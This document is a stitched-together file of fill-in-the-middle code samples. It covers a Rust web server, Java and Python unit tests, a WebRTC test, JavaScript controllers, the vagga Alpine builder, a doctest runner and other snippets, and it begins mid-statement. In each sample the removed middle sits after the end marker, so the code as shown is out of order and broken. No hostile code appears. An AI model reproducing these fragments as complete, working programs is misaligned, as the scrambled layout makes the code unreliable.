2>/dev/null ".format(pstartflag,pstartflag) os.system(cmd2) print "Downloading Images Complete..." os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images<|fim▁end|>
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech" year_input = input()
<|file_name|>main.rs<|end_file_name|><|fim▁begin|>#![deny( missing_debug_implementations, missing_copy_implementations, warnings, trivial_numeric_casts, unstable_features, unused, future_incompatible )] use actix_web::server; use anyhow::Result; use log::info; use potboiler_common::pg; use std::env; fn main() -> Result<()> { log4rs::init_file("log.yaml", Default::default()).expect("log config ok"); let db_url: &str = &env::var("DATABASE_URL").expect("Needed DATABASE_URL");<|fim▁hole|> let pool = pg::get_pool(db_url).unwrap(); let app_state = pigtail::AppState::new(pool)?; let port: u16 = env::var("PORT") .unwrap_or_else(|_| "8000".to_string()) .parse::<u16>() .unwrap(); server::new(move || pigtail::app_router(app_state.clone()).unwrap().finish()) .bind(("0.0.0.0", port)) .unwrap() .run(); pigtail::register(); info!("Pigtail booted"); Ok(()) }<|fim▁end|>
<|file_name|>ReviewInviteControllerTest.java<|end_file_name|><|fim▁begin|>package org.innovateuk.ifs.assessment.invite.controller; import org.innovateuk.ifs.BaseControllerMockMVCTest; import org.innovateuk.ifs.assessment.invite.form.ReviewInviteForm; import org.innovateuk.ifs.assessment.invite.populator.ReviewInviteModelPopulator; import org.innovateuk.ifs.assessment.invite.viewmodel.ReviewInviteViewModel; import org.innovateuk.ifs.invite.resource.RejectionReasonResource; import org.innovateuk.ifs.invite.resource.ReviewInviteResource; import org.innovateuk.ifs.invite.service.RejectionReasonRestService; import org.innovateuk.ifs.review.service.ReviewInviteRestService; import org.junit.Before; import org.junit.Test; import org.junit.runner.RunWith; import org.mockito.InOrder; import org.mockito.InjectMocks; import org.mockito.Mock; import org.mockito.Spy; import org.mockito.junit.MockitoJUnitRunner; import org.springframework.http.MediaType; import org.springframework.test.context.TestPropertySource; import org.springframework.test.web.servlet.MvcResult; import org.springframework.validation.BindingResult; import java.time.ZonedDateTime; import java.util.List; import static java.lang.Boolean.TRUE; import static java.util.Collections.nCopies; import static org.innovateuk.ifs.commons.error.CommonErrors.notFoundError; import static org.innovateuk.ifs.commons.error.CommonFailureKeys.GENERAL_NOT_FOUND; import static org.innovateuk.ifs.commons.rest.RestResult.restFailure; import static org.innovateuk.ifs.commons.rest.RestResult.restSuccess; import static org.innovateuk.ifs.invite.builder.RejectionReasonResourceBuilder.newRejectionReasonResource; import static org.innovateuk.ifs.review.builder.ReviewInviteResourceBuilder.newReviewInviteResource; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertTrue; import static org.mockito.Mockito.*; import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.get; import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.post; import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.*; @RunWith(MockitoJUnitRunner.Silent.class) @TestPropertySource(locations = { "classpath:application.properties", "classpath:/application-web-core.properties"} ) public class ReviewInviteControllerTest extends BaseControllerMockMVCTest<ReviewInviteController> { @Spy @InjectMocks private ReviewInviteModelPopulator reviewInviteModelPopulator; @Mock private RejectionReasonRestService rejectionReasonRestService; @Mock private ReviewInviteRestService reviewInviteRestService; private List<RejectionReasonResource> rejectionReasons = newRejectionReasonResource() .withReason("Reason 1", "Reason 2") .build(2); private static final String restUrl = "/invite/panel/"; @Override protected ReviewInviteController supplyControllerUnderTest() { return new ReviewInviteController(); } @Before public void setUp() { when(rejectionReasonRestService.findAllActive()).thenReturn(restSuccess(rejectionReasons)); } @Test public void acceptInvite_loggedIn() throws Exception { Boolean accept = true; mockMvc.perform(post(restUrl + "{inviteHash}/decision", "hash") .contentType(MediaType.APPLICATION_FORM_URLENCODED) .param("acceptInvitation", accept.toString())) .andExpect(status().is3xxRedirection()) .andExpect(redirectedUrl("/invite-accept/panel/hash/accept")); verifyZeroInteractions(reviewInviteRestService); } @Test public void acceptInvite_notLoggedInAndExistingUser() throws Exception { setLoggedInUser(null); 
ZonedDateTime panelDate = ZonedDateTime.now(); Boolean accept = true; ReviewInviteResource inviteResource = newReviewInviteResource() .withCompetitionName("my competition") .withPanelDate(panelDate) .build(); <|fim▁hole|> ReviewInviteViewModel expectedViewModel = new ReviewInviteViewModel("hash", inviteResource, false); when(reviewInviteRestService.checkExistingUser("hash")).thenReturn(restSuccess(TRUE)); when(reviewInviteRestService.openInvite("hash")).thenReturn(restSuccess(inviteResource)); mockMvc.perform(post(restUrl + "{inviteHash}/decision", "hash") .contentType(MediaType.APPLICATION_FORM_URLENCODED) .param("acceptInvitation", accept.toString())) .andExpect(status().isOk()) .andExpect(model().attribute("model", expectedViewModel)) .andExpect(view().name("assessor-panel-accept-user-exists-but-not-logged-in")); InOrder inOrder = inOrder(reviewInviteRestService); inOrder.verify(reviewInviteRestService).checkExistingUser("hash"); inOrder.verify(reviewInviteRestService).openInvite("hash"); inOrder.verifyNoMoreInteractions(); } @Test public void confirmAcceptInvite() throws Exception { when(reviewInviteRestService.acceptInvite("hash")).thenReturn(restSuccess()); mockMvc.perform(get("/invite-accept/panel/{inviteHash}/accept", "hash")) .andExpect(status().is3xxRedirection()) .andExpect(redirectedUrl("/assessor/dashboard")); verify(reviewInviteRestService).acceptInvite("hash"); } @Test public void confirmAcceptInvite_hashNotExists() throws Exception { when(reviewInviteRestService.acceptInvite("notExistHash")).thenReturn(restFailure(GENERAL_NOT_FOUND)); mockMvc.perform(get("/invite-accept/panel/{inviteHash}/accept", "notExistHash")) .andExpect(status().isNotFound()); verify(reviewInviteRestService).acceptInvite("notExistHash"); } @Test public void openInvite() throws Exception { ZonedDateTime panelDate = ZonedDateTime.now(); ReviewInviteResource inviteResource = newReviewInviteResource().withCompetitionName("my competition") .withPanelDate(panelDate) .build(); ReviewInviteViewModel expectedViewModel = new ReviewInviteViewModel("hash", inviteResource, true); when(reviewInviteRestService.openInvite("hash")).thenReturn(restSuccess(inviteResource)); mockMvc.perform(get(restUrl + "{inviteHash}", "hash")) .andExpect(status().isOk()) .andExpect(view().name("assessor-panel-invite")) .andExpect(model().attribute("model", expectedViewModel)); verify(reviewInviteRestService).openInvite("hash"); } @Test public void openInvite_hashNotExists() throws Exception { when(reviewInviteRestService.openInvite("notExistHash")).thenReturn(restFailure(notFoundError(ReviewInviteResource.class, "notExistHash"))); mockMvc.perform(get(restUrl + "{inviteHash}", "notExistHash")) .andExpect(model().attributeDoesNotExist("model")) .andExpect(status().isNotFound()); verify(reviewInviteRestService).openInvite("notExistHash"); } @Test public void noDecisionMade() throws Exception { ReviewInviteResource inviteResource = newReviewInviteResource().withCompetitionName("my competition").build(); when(reviewInviteRestService.openInvite("hash")).thenReturn(restSuccess(inviteResource)); ReviewInviteForm expectedForm = new ReviewInviteForm(); MvcResult result = mockMvc.perform(post(restUrl + "{inviteHash}/decision", "hash")) .andExpect(status().isOk()) .andExpect(model().hasErrors()) .andExpect(model().attributeHasFieldErrors("form", "acceptInvitation")) .andExpect(model().attribute("form", expectedForm)) .andExpect(model().attribute("rejectionReasons", rejectionReasons)) .andExpect(model().attributeExists("model")) 
.andExpect(view().name("assessor-panel-invite")).andReturn(); ReviewInviteViewModel model = (ReviewInviteViewModel) result.getModelAndView().getModel().get("model"); assertEquals("hash", model.getPanelInviteHash()); assertEquals("my competition", model.getCompetitionName()); ReviewInviteForm form = (ReviewInviteForm) result.getModelAndView().getModel().get("form"); BindingResult bindingResult = form.getBindingResult(); assertTrue(bindingResult.hasErrors()); assertEquals(0, bindingResult.getGlobalErrorCount()); assertEquals(1, bindingResult.getFieldErrorCount()); assertTrue(bindingResult.hasFieldErrors("acceptInvitation")); assertEquals("Please indicate your decision.", bindingResult.getFieldError("acceptInvitation").getDefaultMessage()); verify(reviewInviteRestService).openInvite("hash"); verifyNoMoreInteractions(reviewInviteRestService); } @Test public void rejectInvite() throws Exception { Boolean accept = false; when(reviewInviteRestService.rejectInvite("hash")).thenReturn(restSuccess()); mockMvc.perform(post(restUrl + "{inviteHash}/decision", "hash") .contentType(MediaType.APPLICATION_FORM_URLENCODED) .param("acceptInvitation", accept.toString())) .andExpect(status().is3xxRedirection()) .andExpect(redirectedUrl("/invite/panel/hash/reject/thank-you")); verify(reviewInviteRestService).rejectInvite("hash"); verifyNoMoreInteractions(reviewInviteRestService); } @Test public void rejectInvite_hashNotExists() throws Exception { String comment = String.join(" ", nCopies(100, "comment")); Boolean accept = false; when(reviewInviteRestService.rejectInvite("notExistHash")).thenReturn(restFailure(notFoundError(ReviewInviteResource.class, "notExistHash"))); when(reviewInviteRestService.openInvite("notExistHash")).thenReturn(restFailure(notFoundError(ReviewInviteResource.class, "notExistHash"))); mockMvc.perform(post(restUrl + "{inviteHash}/decision", "notExistHash") .contentType(MediaType.APPLICATION_FORM_URLENCODED) .param("acceptInvitation", accept.toString())) .andExpect(status().isNotFound()); InOrder inOrder = inOrder(reviewInviteRestService); inOrder.verify(reviewInviteRestService).rejectInvite("notExistHash"); inOrder.verify(reviewInviteRestService).openInvite("notExistHash"); inOrder.verifyNoMoreInteractions(); } @Test public void rejectThankYou() throws Exception { mockMvc.perform(get(restUrl + "{inviteHash}/reject/thank-you", "hash")) .andExpect(status().isOk()) .andExpect(view().name("assessor-panel-reject")) .andReturn(); } }<|fim▁end|>
<|file_name|>test_cuttle_class.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 """ Tests related to the Cuttle class. """ import os import unittest import warnings import time from cuttle.reef import Cuttle, Column from cuttlepool import CuttlePool from cuttlepool.cuttlepool import PoolConnection DB = '_cuttle_test_db' DB2 = '_cuttle_test_db2' HOST = 'localhost' class BaseDbTestCase(unittest.TestCase): def setUp(self): self.Pool = CuttlePool self.Connection = PoolConnection self.credentials = dict(host=HOST) self.sql_type = os.environ['TEST_CUTTLE'].lower() if self.sql_type == 'mysql': import pymysql from mysql_credentials import USER, PASSWD self.Cursor = pymysql.cursors.Cursor self.connect = pymysql.connect self.credentials.update(dict(user=USER, passwd=PASSWD)) self.db = Cuttle(self.sql_type, db=DB, **self.credentials) class Heros(self.db.Model): columns = [ Column('hero_id', 'INT', auto_increment=True, primary_key=True), Column('hero_name', 'VARCHAR', maximum=16) ] self.testtable1 = Heros self.create_heros_statement = ( 'CREATE TABLE IF NOT EXISTS {} (\n' 'hero_id INT AUTO_INCREMENT PRIMARY KEY,\n' 'hero_name VARCHAR(16)\n' ')').format(self.testtable1().name) self.heros_schema = (('hero_id', 'int(11)', 'NO', 'PRI', None, 'auto_increment'), ('hero_name', 'varchar(16)', 'YES', '', None, '')) def tearDown(self): warnings.filterwarnings('ignore') self.db.drop_db() def createPool(self, **kwargs): warnings.filterwarnings('ignore') return CuttlePool(self.connect, **kwargs) class DbNestedModelTestCase(BaseDbTestCase): def setUp(self): super(DbNestedModelTestCase, self).setUp() class UselessTable(self.db.Model): pass self.uselesstable = UselessTable class Villains(UselessTable): columns = [ Column('villain_id', 'INT'), Column('villain_name', 'VARCHAR', maximum=16) ] self.testtable2 = Villains class TwoDbTestCase(BaseDbTestCase): def setUp(self): super(TwoDbTestCase, self).setUp() self.db2 = Cuttle(self.sql_type, db=DB2, **self.credentials) class ThrowAway(self.db2.Model): columns = [ Column('throwaway', 'INT') ] self.testtable2 = ThrowAway<|fim▁hole|> super(TwoDbTestCase, self).tearDown() self.db2.drop_db() class CuttleInstanceTestCase(unittest.TestCase): def test_improper_sql_type(self): with self.assertRaises(ValueError): db = Cuttle('wrongsql', db='db') def test_no_db(self): with self.assertRaises(ValueError): db = Cuttle('mysql') def test_name_property(self): db_name = 'get_schwifty' db = Cuttle('mysql', db=db_name) self.assertEqual(db.name, db_name) class CuttleCreateDbTestCase(BaseDbTestCase): def test_create_db(self): self.db.create_db() pool = self.createPool(db=DB, **self.credentials) con = pool.get_connection() cur = con.cursor() # get databases cur.execute('SHOW DATABASES') dbs = cur.fetchall() self.assertIn((DB,), dbs) def test_table_schema(self): self.db.create_db() pool = self.createPool(db=DB, **self.credentials) con = pool.get_connection() cur = con.cursor() # get tables cur.execute('SHOW TABLES') tbls = cur.fetchall() self.assertEqual(((self.testtable1().name,),), tbls) # get table schema cur.execute('DESCRIBE {}'.format(self.testtable1().name)) tblschma = cur.fetchall() self.assertEqual(self.heros_schema, tblschma) class CuttleCreateMultiDbTestCase(TwoDbTestCase): def test_create_two_dbs(self): self.db.create_db() self.db2.create_db() pool1 = self.createPool(db=DB, **self.credentials) pool2 = self.createPool(db=DB2, **self.credentials) con1 = pool1.get_connection() cur1 = con1.cursor() con2 = pool2.get_connection() cur2 = con2.cursor() # get databases cur1.execute('SHOW 
DATABASES') dbs = cur1.fetchall() self.assertIn((DB,), dbs) self.assertIn((DB2,), dbs) # get tables cur1.execute('SHOW TABLES') tbls1 = cur1.fetchall() cur2.execute('SHOW TABLES') tbls2 = cur2.fetchall() self.assertIn((self.testtable1().name,), tbls1) self.assertNotIn((self.testtable2().name,), tbls1) self.assertIn((self.testtable2().name,), tbls2) self.assertNotIn((self.testtable1().name,), tbls2) class CuttleCreateDbNestedModelsTestCase(DbNestedModelTestCase): def test_correct_tables_made(self): self.db.create_db() pool = self.createPool(db=DB, **self.credentials) con = pool.get_connection() cur = con.cursor() # get tables cur.execute('SHOW TABLES') tbls = cur.fetchall() self.assertIn((self.testtable1().name,), tbls) self.assertIn((self.testtable2().name,), tbls) self.assertNotIn((self.uselesstable().name,), tbls) class CuttleDropDbTestCase(BaseDbTestCase): def setUp(self): super(CuttleDropDbTestCase, self).setUp() self.db.create_db() def test_drop_db(self): pool = self.createPool(**self.credentials) con = pool.get_connection() cur = con.cursor() # get databases cur.execute('SHOW DATABASES') dbs = cur.fetchall() # make sure database actually exists self.assertIn((DB,), dbs) # drop the database self.db.drop_db() # get databases cur.execute('SHOW DATABASES') dbs = cur.fetchall() # make sure database no longer exists self.assertNotIn((DB,), dbs)<|fim▁end|>
def tearDown(self):
<|file_name|>base_primitives.cc<|end_file_name|><|fim▁begin|><|fim▁hole|>/* * Copyright (c) 2012 The WebRTC project authors. All Rights Reserved. * * Use of this source code is governed by a BSD-style license * that can be found in the LICENSE file in the root of the source * tree. An additional intellectual property rights grant can be found * in the file PATENTS. All contributing project authors may * be found in the AUTHORS file in the root of the source tree. */ #include "base_primitives.h" #include "vie_autotest.h" #include "vie_autotest_defines.h" #include "webrtc/modules/video_capture/include/video_capture_factory.h" void TestI420CallSetup(webrtc::ViECodec* codec_interface, webrtc::VideoEngine* video_engine, webrtc::ViEBase* base_interface, webrtc::ViENetwork* network_interface, int video_channel, const char* device_name) { webrtc::VideoCodec video_codec; memset(&video_codec, 0, sizeof(webrtc::VideoCodec)); // Set up the codec interface with all known receive codecs and with // I420 as the send codec. for (int i = 0; i < codec_interface->NumberOfCodecs(); i++) { EXPECT_EQ(0, codec_interface->GetCodec(i, video_codec)); // Try to keep the test frame size small when I420. if (video_codec.codecType == webrtc::kVideoCodecI420) { video_codec.width = 176; video_codec.height = 144; EXPECT_EQ(0, codec_interface->SetSendCodec(video_channel, video_codec)); } EXPECT_EQ(0, codec_interface->SetReceiveCodec(video_channel, video_codec)); } // Verify that we really found the I420 codec. EXPECT_EQ(0, codec_interface->GetSendCodec(video_channel, video_codec)); EXPECT_EQ(webrtc::kVideoCodecI420, video_codec.codecType); // Set up senders and receivers. char version[1024] = ""; EXPECT_EQ(0, base_interface->GetVersion(version)); ViETest::Log("\nUsing WebRTC Video Engine version: %s", version); const char *ipAddress = "127.0.0.1"; WebRtc_UWord16 rtpPortListen = 6100; WebRtc_UWord16 rtpPortSend = 6100; EXPECT_EQ(0, network_interface->SetLocalReceiver(video_channel, rtpPortListen)); EXPECT_EQ(0, base_interface->StartReceive(video_channel)); EXPECT_EQ(0, network_interface->SetSendDestination(video_channel, ipAddress, rtpPortSend)); EXPECT_EQ(0, base_interface->StartSend(video_channel)); // Call started. ViETest::Log("Call started"); AutoTestSleep(KAutoTestSleepTimeMs); // Done. EXPECT_EQ(0, base_interface->StopSend(video_channel)); }<|fim▁end|>
<|file_name|>original-document.js<|end_file_name|><|fim▁begin|>'use strict'; var util = require('util'); var BaseController = require('hof').controllers.base; var OriginalDocumentController = function OriginalDocumentController() { BaseController.apply(this, arguments); }; util.inherits(OriginalDocumentController, BaseController); OriginalDocumentController.prototype.getValues = function getValues(req, res, callback) { res.locals.backLink = 'other-documents'; BaseController.prototype.getValues.call(this, req, res, callback);<|fim▁hole|>} module.exports = OriginalDocumentController;<|fim▁end|>
<|file_name|>main.rs<|end_file_name|><|fim▁begin|>mod modul1;<|fim▁hole|> fn main() { modul1::func1(); modul2::func1(); // func1(); // error: unresolved name `func1` // func1(); // works when use modul1::func1; is added } // called func1 from modul1 // called func1 from modul2<|fim▁end|>
mod modul2; // use modul1::func1;
<|file_name|>alpine.rs<|end_file_name|><|fim▁begin|>use std::io::Write; use std::fs::File; use std::path::Path; use unshare::{Command, Stdio}; use rand::{thread_rng, Rng}; use super::super::super::file_util::create_dir; use super::super::context::{Context}; use super::super::capsule; use super::super::packages; use process_util::capture_stdout; use builder::distrib::{Distribution, Named, DistroBox}; use builder::error::StepError;<|fim▁hole|> #[derive(Debug)] pub struct Alpine { pub version: String, pub base_setup: bool, } impl Named for Alpine { fn static_name() -> &'static str { "alpine" } } impl Distribution for Alpine { fn name(&self) -> &'static str { "Alpine" } fn bootstrap(&mut self, ctx: &mut Context) -> Result<(), StepError> { if !self.base_setup { self.base_setup = true; try!(setup_base(ctx, &self.version)); } Ok(()) } fn install(&mut self, ctx: &mut Context, pkgs: &[String]) -> Result<(), StepError> { try!(self.bootstrap(ctx)); try!(capsule::apk_run(&[ "--root", "/vagga/root", "add", ], &pkgs[..])); Ok(()) } fn ensure_packages(&mut self, ctx: &mut Context, features: &[packages::Package]) -> Result<Vec<packages::Package>, StepError> { try!(self.bootstrap(ctx)); let mut to_install = vec!(); let mut unsupp = vec!(); for i in features.iter() { if let Some(lst) = build_deps(*i) { for i in lst.into_iter() { if !ctx.packages.contains(i) { if ctx.build_deps.insert(i.to_string()) { to_install.push(i.to_string()); } } } } else { unsupp.push(*i); continue; } if let Some(lst) = system_deps(*i) { for i in lst.into_iter() { let istr = i.to_string(); ctx.build_deps.remove(&istr); if ctx.packages.insert(istr.clone()) { to_install.push(istr); } } } else { unsupp.push(*i); continue; } } if to_install.len() > 0 { try!(capsule::apk_run(&[ "--root", "/vagga/root", "add", ], &to_install[..])); } return Ok(unsupp); } fn finish(&mut self, ctx: &mut Context) -> Result<(), String> { let pkgs = ctx.build_deps.clone().into_iter().collect(); try!(remove(ctx, &pkgs)); let mut cmd = Command::new("/vagga/bin/apk"); cmd .stdin(Stdio::null()) .env_clear() .arg("--root").arg("/vagga/root") .arg("-vv") .arg("info"); try!(capture_stdout(cmd) .map_err(|e| format!("Error dumping package list: {}", e)) .and_then(|out| { File::create("/vagga/container/alpine-packages.txt") .and_then(|mut f| f.write_all(&out)) .map_err(|e| format!("Error dumping package list: {}", e)) })); Ok(()) } } pub fn choose_mirror() -> String { let repos = MIRRORS .split('\n') .map(|x| x.trim()) .filter(|x| x.len() > 0 && !x.starts_with("#")) .collect::<Vec<&str>>(); let mirror = thread_rng().choose(&repos) .expect("At least one mirror should work"); debug!("Chosen mirror {}", mirror); return mirror.to_string(); } fn setup_base(ctx: &mut Context, version: &String) -> Result<(), String> { try!(capsule::ensure_features(ctx, &[capsule::AlpineInstaller])); try_msg!(create_dir("/vagga/root/etc/apk", true), "Error creating apk dir: {err}"); let mirror = ctx.settings.alpine_mirror.clone() .unwrap_or(choose_mirror()); try!(File::create("/vagga/root/etc/apk/repositories") .and_then(|mut f| write!(&mut f, "{}{}/main\n", mirror, version)) .map_err(|e| format!("Can't write repositories file: {}", e))); try!(capsule::apk_run(&[ "--update-cache", "--keys-dir=/etc/apk/keys", // Use keys from capsule "--root=/vagga/root", "--initdb", "add", "alpine-base", ], &[])); Ok(()) } pub fn remove(_ctx: &mut Context, pkgs: &Vec<String>) -> Result<(), String> { capsule::apk_run(&[ "--root", "/vagga/root", "del", ], &pkgs[..]) } fn build_deps(pkg: packages::Package) -> 
Option<Vec<&'static str>> { match pkg { packages::BuildEssential => Some(vec!("build-base")), packages::Https => Some(vec!("ca-certificates")), packages::Python2 => Some(vec!()), packages::Python2Dev => Some(vec!("python-dev")), packages::Python3 => Some(vec!()), packages::Python3Dev => Some(vec!("python3-dev")), packages::PipPy2 => None, packages::PipPy3 => None, packages::NodeJs => Some(vec!()), packages::NodeJsDev => Some(vec!("nodejs-dev")), packages::Npm => Some(vec!()), packages::Git => Some(vec!("git")), packages::Mercurial => Some(vec!("hg")), } } fn system_deps(pkg: packages::Package) -> Option<Vec<&'static str>> { match pkg { packages::BuildEssential => Some(vec!()), packages::Https => Some(vec!()), packages::Python2 => Some(vec!("python")), packages::Python2Dev => Some(vec!()), packages::Python3 => Some(vec!("python3")), packages::Python3Dev => Some(vec!()), packages::PipPy2 => None, packages::PipPy3 => None, packages::NodeJs => Some(vec!("nodejs")), packages::NodeJsDev => Some(vec!()), packages::Npm => Some(vec!("nodejs")), // Need duplicate? packages::Git => Some(vec!()), packages::Mercurial => Some(vec!()), } } pub fn configure(distro: &mut Box<Distribution>, ctx: &mut Context, ver: &str) -> Result<(), StepError> { try!(distro.set(Alpine { version: ver.to_string(), base_setup: false, })); try!(ctx.add_cache_dir(Path::new("/etc/apk/cache"), "alpine-cache".to_string())); ctx.environ.insert("LANG".to_string(), "en_US.UTF-8".to_string()); ctx.environ.insert("PATH".to_string(), "/usr/local/sbin:/usr/local/bin:\ /usr/sbin:/usr/bin:/sbin:/bin\ ".to_string()); Ok(()) }<|fim▁end|>
pub static LATEST_VERSION: &'static str = "v3.2"; static MIRRORS: &'static str = include_str!("../../../alpine/MIRRORS.txt");
<|file_name|>ResolveSimpleNameClassName.java<|end_file_name|><|fim▁begin|>package org.ljc.adoptojdk.class_name; import java.util.ArrayList; import java.util.Collection; import java.util.HashSet; <|fim▁hole|>import java.util.List; import java.util.Set; public class ResolveSimpleNameClassName { private Collection<String> packages = null; public Collection<String> getPackages() { Set<String> returnPackages = new HashSet<String>(); for (Package aPackage : Package.getPackages()) { returnPackages.add(aPackage.getName()); } return returnPackages; } public List<String> getFullyQualifiedNames(String simpleName) { if (this.packages == null) { this.packages = getPackages(); } List<String> fqns = new ArrayList<String>(); for (String aPackage : packages) { try { String fqn = aPackage + "." + simpleName; Class.forName(fqn); fqns.add(fqn); } catch (Exception e) { // Ignore } } return fqns; } }<|fim▁end|>
<|file_name|>groupBy.js<|end_file_name|><|fim▁begin|>const { stripIndent } = require('common-tags') <|fim▁hole|> let people = listOfPeople(); <> <${widgetName} data={people} textField='fullName' groupBy='lastName' /> <${widgetName} data={people} textField='fullName' groupBy={person => person.fullName.length} /> </> ` }<|fim▁end|>
module.exports = function (widgetName) { return stripIndent` import { ${widgetName} } from 'react-widgets';
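For context on the groupBy prop exercised in the groupBy.js row above: react-widgets accepts either a field name or a grouping function. A small Python sketch of the equivalent grouping semantics (the person records are invented for illustration):

from collections import defaultdict

people = [
    {'fullName': 'Ada Lovelace', 'lastName': 'Lovelace'},
    {'fullName': 'Alan Turing', 'lastName': 'Turing'},
]

def group_by(items, key):
    # `key` may be a field name (string) or a callable, mirroring the widget prop.
    key_fn = key if callable(key) else (lambda item: item[key])
    groups = defaultdict(list)
    for item in items:
        groups[key_fn(item)].append(item)
    return dict(groups)

print(group_by(people, 'lastName'))
print(group_by(people, lambda p: len(p['fullName'])))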
<|file_name|>page.rs<|end_file_name|><|fim▁begin|>use iron::prelude::*; use iron::middleware::Handler; use iron::status; use iron::headers::{ContentType}; use utils::Utils; use rustview::view::View; pub struct Index { utils: Utils, template: View, } impl Index { pub fn new(utils: Utils, admin_template: View) -> Index { Index { utils: utils, template: admin_template, } } } impl Handler for Index { fn handle(&self, req: &mut Request) -> IronResult<Response> { let model = json!({ "title": "Testing", "newTitle": "New Cool Title here :)", "helloUser": "Hi Andrei !", "testText": "It's working!!!!!", "user": "Andrei", "child_user": "Pages" });<|fim▁hole|> Ok(response) } }<|fim▁end|>
let mut response = Response::with((status::Ok, self.template.render("home.html", model))); response.headers.set(ContentType::html());
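The Iron handler in the page.rs row builds a JSON model, renders it through a template, and forces an HTML content type. A rough Python sketch of that request flow (the render function here is a trivial stand-in, not the rustview API):

def render(template_name, model):
    # Trivial stand-in renderer; a real engine would load template_name.
    return '<h1>{}</h1>'.format(model['title'])

def handle(request):
    model = {'title': 'Testing', 'user': 'Andrei'}
    body = render('home.html', model)
    # Pairing the body with an explicit Content-Type mirrors
    # response.headers.set(ContentType::html()) above.
    return 200, {'Content-Type': 'text/html'}, body

print(handle(None))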
<|file_name|>inputs_p38_singlet.py<|end_file_name|><|fim▁begin|>import json import numpy as np from glob import glob inputs = { 'xml_file_path' : "./data/single_wavelength_copy", 'file_set' : {'p38' : glob( "./data/single_wavelength_copy/*.xml")}, 'section' : '280_480_TOP_120', 'ligand_order' : ['Bosutinib','Bosutinib Isomer','Erlotinib','Gefitinib','Ponatinib','Lapatinib','Saracatinib','Vandetanib'],<|fim▁hole|> 'well_area' : 0.1369, # well area, cm^2 for 4ti-0203 [http://4ti.co.uk/files/3113/4217/2464/4ti-0201.pdf] } inputs['Lstated'] = inputs['Lstated'].tolist() inputs['Pstated'] = inputs['Pstated'].tolist() with open('inputs.json', 'w') as fp: json.dump(inputs, fp)<|fim▁end|>
'Lstated' : np.array([20.0e-6,14.0e-6,9.82e-6,6.88e-6,4.82e-6,3.38e-6,2.37e-6,1.66e-6,1.16e-6,0.815e-6,0.571e-6,0.4e-6,0.28e-6,0.196e-6,0.138e-6,0.0964e-6,0.0676e-6,0.0474e-6,0.0320e-6,0.0240e-6,0.0160e-6,0.0120e-6,0.008e-6,0.0], np.float64), # ligand concentration, M 'Pstated' : 0.5e-6 * np.ones([24],np.float64), # protein concentration, M 'assay_volume' : 50e-6, # assay volume, L
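The .tolist() conversions at the end of the inputs_p38_singlet.py row are load-bearing: NumPy arrays are not JSON-serializable. A minimal reproduction of the pattern:

import json
import numpy as np

inputs = {'Lstated': np.array([20.0e-6, 14.0e-6]), 'assay_volume': 50e-6}

# json.dumps(inputs) would raise a TypeError at this point, so arrays are
# converted to plain lists first, exactly as the script above does.
inputs['Lstated'] = inputs['Lstated'].tolist()

print(json.dumps(inputs))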
<|file_name|>run_examples.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python import doctest<|fim▁hole|>import sys def test_suite(docs): suite = unittest.TestSuite() for doc in docs: suite.addTest(doctest.DocFileSuite(doc, optionflags=flags())) return suite def flags(): flags = doctest.NORMALIZE_WHITESPACE|doctest.ELLIPSIS if sys.version_info >= (3,): flags |= doctest.IGNORE_EXCEPTION_DETAIL return flags def run(docs): suite = test_suite(docs) runner = unittest.TextTestRunner(verbosity=2) result = runner.run(suite) sys.exit(int(bool(result.failures or result.errors))) if __name__ == '__main__': run(sys.argv)<|fim▁end|>
import unittest
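The run_examples.py row wraps each file in a DocFileSuite built with NORMALIZE_WHITESPACE and ELLIPSIS. The same flags can be exercised against an inline docstring (a self-contained sketch, separate from the original script):

import doctest

def double(x):
    """
    >>> double(2)
    4
    >>> double(21)
    4...
    """
    return 2 * x

# Mirrors flags() above: whitespace is normalized and '...' matches any tail,
# so the expected output '4...' accepts the actual result 42.
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS)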
<|file_name|>test_plugin_maven.py<|end_file_name|><|fim▁begin|># -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*- # # Copyright (C) 2016 Canonical Ltd # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License version 3 as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import io import os from unittest import mock from xml.etree import ElementTree import fixtures from testtools.matchers import HasLength import snapcraft from snapcraft import tests from snapcraft.plugins import maven class MavenPluginTestCase(tests.TestCase): def setUp(self): super().setUp() class Options: maven_options = [] maven_targets = [''] self.options = Options() self.project_options = snapcraft.ProjectOptions() patcher = mock.patch('snapcraft.repo.Ubuntu') self.ubuntu_mock = patcher.start() self.addCleanup(patcher.stop) @staticmethod def _canonicalize_settings(settings): with io.StringIO(settings) as f: tree = ElementTree.parse(f) for element in tree.iter(): if element.text is not None and element.text.isspace(): element.text = None if element.tail is not None and element.tail.isspace(): element.tail = None with io.StringIO() as f: tree.write( f, encoding='unicode', default_namespace='http://maven.apache.org/SETTINGS/1.0.0') return f.getvalue() + '\n' def test_get_build_properties(self): expected_build_properties = ['maven-options', 'maven-targets'] resulting_build_properties = maven.MavenPlugin.get_build_properties() self.assertThat(resulting_build_properties, HasLength(len(expected_build_properties))) for property in expected_build_properties: self.assertIn(property, resulting_build_properties) def assertSettingsEqual(self, expected, observed): print(repr(self._canonicalize_settings(expected))) print(repr(self._canonicalize_settings(observed))) self.assertEqual( self._canonicalize_settings(expected), self._canonicalize_settings(observed)) def test_schema(self): schema = maven.MavenPlugin.schema() properties = schema['properties'] self.assertTrue('maven-options' in properties, 'Expected "maven-options" to be included in ' 'properties') maven_options = properties['maven-options'] self.assertTrue( 'type' in maven_options, 'Expected "type" to be included in "maven-options"') self.assertEqual(maven_options['type'], 'array', 'Expected "maven-options" "type" to be "array", but ' 'it was "{}"'.format(maven_options['type'])) self.assertTrue( 'minitems' in maven_options, 'Expected "minitems" to be included in "maven-options"') self.assertEqual(maven_options['minitems'], 